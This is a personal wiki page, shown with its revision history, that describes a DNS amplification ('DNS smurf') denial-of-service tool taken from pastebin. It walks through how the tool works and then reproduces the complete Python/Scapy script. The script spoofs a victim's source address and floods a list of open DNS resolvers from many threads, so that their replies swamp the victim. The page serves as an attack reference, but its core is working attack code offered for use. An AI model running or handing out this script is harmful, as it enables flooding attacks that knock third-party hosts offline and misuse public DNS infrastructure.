DoS/DNSSmurf: Difference between revisions
From charlesreid1
No edit summary |
m (Admin moved page DNSSmurf to DoS/DNSSmurf) |
||
| (3 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
==Tool: dnssmurf== | ==Tool: dnssmurf== | ||
Found | Found a DNS smurf tool from K-Metal on pastebin: http://pastebin.com/gTxRQuFY | ||
Here's how it works: | Here's how it works: | ||
| Line 74: | Line 74: | ||
time.sleep(1) | time.sleep(1) | ||
</pre> | </pre> | ||
=Flags= | |||
{{DoSFlag}} | |||
Latest revision as of 23:30, 24 August 2016
Tool: dnssmurf
Found a DNS smurf tool from K-Metal on pastebin: http://pastebin.com/gTxRQuFY
Here's how it works:
- Read in a list of DNS servers
- Start a large thread pool
- With each thread in the pool, run the attack function
The attack function works as follows:
- Loop over entire list of DNS servers
- Send a crafted DNS request to each server
The real money shot is here: the use of Scapy to craft the DNS request:
p=IP(dst=List[count],src=host) u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query send(p/u,verbose=0)
It's sending a UDP over IP packet to one of the DNS servers found in the file, and setting it to look like it came from the sheep. The DNS packet is sent to port 53, and a random destination port is set. The DNS request is for "goo.gl".
This is simply run repeatedly, ad infinitum, by as many servers and threads as you'd like, with as many DNS servers as you'd like.
dnssmurf.py:
#!/usr/bin/env python
######################
# DNS AMP dos attack #
# by K-Metal #
######################
from scapy.all import *
import threading, sys, random, time
#Proof of Concept
if len(sys.argv) < 2: #Print Help
print "Usage: "+sys.argv[0]+" <ip> <list> <threads>"
sys.exit()
host = sys.argv[1] #Variables
File = sys.argv[2]
numthreads = int(sys.argv[3])
threads = []
with open(File) as f: #Read list
List = f.readlines()
Max = len(List) #Max length of the list
def flood():
global host
global List
global Max
print "Flooding..."
while True:
count = 0
while count < Max:
p=IP(dst=List[count],src=host)
u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
send(p/u,verbose=0)
for n in range(numthreads): #Multi-threading
t = threading.Thread(target=flood)
t.daemon = True
t.start()
threads.append(t)
while True: #So CTRL+C kills all threads
time.sleep(1)
Flags
 |
Denial of Service denial of service attacks for denying users access to resources that they are otherwise entitled to access.
DoS at Layers 1 and 2: CAM Table Overflow/MAC Flood: DoS/Mac Flood CAM Table Poisoning: DoS/Cam Poisoning
DoS at Layers 3 and 4: Syn Flood: DoS/SYN Flood Smurf Attack (Ping Flood): DoS/Smurf Attack DNS Attacks: DoS/DNS DNSSmurf Attack: DoS/DNSSmurf Wormhole Attack: DoS/Wormhole Attack Black Hole Attack: DoS/Black Hole Attack Byzantine Attack: DoS/Byzantine Attack Sleep Deprivation Attack: DoS/Sleep Deprivation Attack Stale Packets: DoS/Stale Packets
Toolz: Hping · Macof · Tcpnice · Hammer · Tors Hammer
Category:DoS · Category:Attacks · Category:Kali Attack Layers Flags · Template:DoSFlag · e |